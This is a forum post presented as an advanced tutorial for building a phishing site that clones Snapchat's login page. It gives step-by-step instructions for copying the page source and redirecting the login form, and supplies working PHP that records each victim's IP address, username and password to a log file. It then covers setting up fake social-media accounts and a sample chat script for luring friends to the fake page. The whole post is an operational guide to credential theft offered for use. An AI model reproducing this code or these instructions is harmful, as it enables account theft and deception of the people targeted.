HOW TO MAKE A PHISHING WEBITE [ADVANCED TUTORIAL]

• Search zippyshare.cloud on google and enjoy unlimited cloud storage
  • You Must Read our New Rules and Guidelines (HERE)

Ruchika oberoi

Administrator
Staff member
Mar 27, 2022
In this thread I will show you how to:
Get a free domain.
Setup and steal a website source.
How to setup the website for phising.
How to semi-social engineer.

So what you need:
1 : Notepad of some short - Notepad++ for the simplest.
2 : Knowledge of *Social Engineering*
3 : A domain | I recommend using for a free domain.
4 : Webhosting >> Make sure to not use [free] webhostng, it'll get banned in less then 10 minutes.

Okay so you have that?, ready to start!

1 : Okay so first you need to go to the website your wanting to copy in my case it's gonna be snapchat aka

2 : Now that your on the page you want, your gonna go ahead and press [F12] on your keyboard, or right-click and
press *Inspect elements*

3 : Now that you have *Inspect elements* opened, you want to scroll all the way to the top where the <html> tag starts
and right click it and press *Edit as html* heres a screenshot/gif |

4 : Now press ctrl-a then press ctrl-c to copy it all, then create a file on your desktop and name it whatever.

5 : Now after you have created the file, you want to go ahead and make another file called *index.html*.

6 : After you create *index.html* right click it and press open with *notepad++* or whatever your using,
and press *ctrl-v* to paste the copied code and press *ctrl-s* to save it.

7 : After that go ahead and press *ctrl-f* and it should pop a search box up,
theres a couple different ways you can find the <form> box, you can use the search box to help find it, but it will look something
like this |

8 : After you find that you need to find where it says *action="something.php"* < it wont say *something, it'll be like login.php, or something*
random, but you need to change it to action="post.php"

9 : After you have change it to *post.php*, you need to go back into that file where you created *index.html* and make another file called *post.php*.

10 : After that you will need to put the following code into it **post.php**
Code:
<?php function grabip(){ if(!empty($_SERVER['HTTP_CLIENT_IP'])){ $ip= $_SERVER['HTTP_CLIENT_IP']; }elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip= $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip= $_SERVER['REMOTE_ADDR']; } return $ip; } header('Location: '); $handle= fopen("log.txt", "a"); fwrite($handle, "IPAddress : ".grabip()."\n"); foreach($_POSTas $variable=> $value) { fwrite($handle, $variable); fwrite($handle, " : "); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n========================================="); fclose($handle); exit; ?>

11 : Now since i'm doing snapchat, the header will change to * *, if you doing another website just change the header part to the website login your phishing for, so it will redirect them to the actual website.

13: Okay now that you have that all set up you need to go back into the file where everything is and create a file named
*log.txt* << This is where the usernames/emails : passwords + ip is gonna be stored!.

----------the files should look like this

14: After all that go ahead and upload it to the web-server! and your all set!.

15 : So this is everything for the page itself, you need to test the website to make sure it all worked.

=18Okay so it works great, now we need to get peoples passwords >

1 : Create a fake facebook account or snapchat account or instagram account, or just create all 3 of them.
- if you created a snapchat account, you will need to go to quick-add and add tons of people.
- if you created a facebook account, you will need to friend tons of people.
- if you created a instagram, you will need to following a bunch of people.

2 : *Social Engineering* - so getting people to go to your phishing website should be decently simple,
after all you probably don't have many friends that's as smart as you at this point

3 : You will need to talk them into something for example

[ SNAPCHAT | 10:10 _-` `===`]
|_________________________________>>>|
| |
|> Hello? |
| Yo I found a really cool snapscore hack<|
|> Really? |
| Yeah wanna see?<|
|> Sure why not |
| ight bet <|
|> Bet |
| Just login snapchat, I gave you the link<|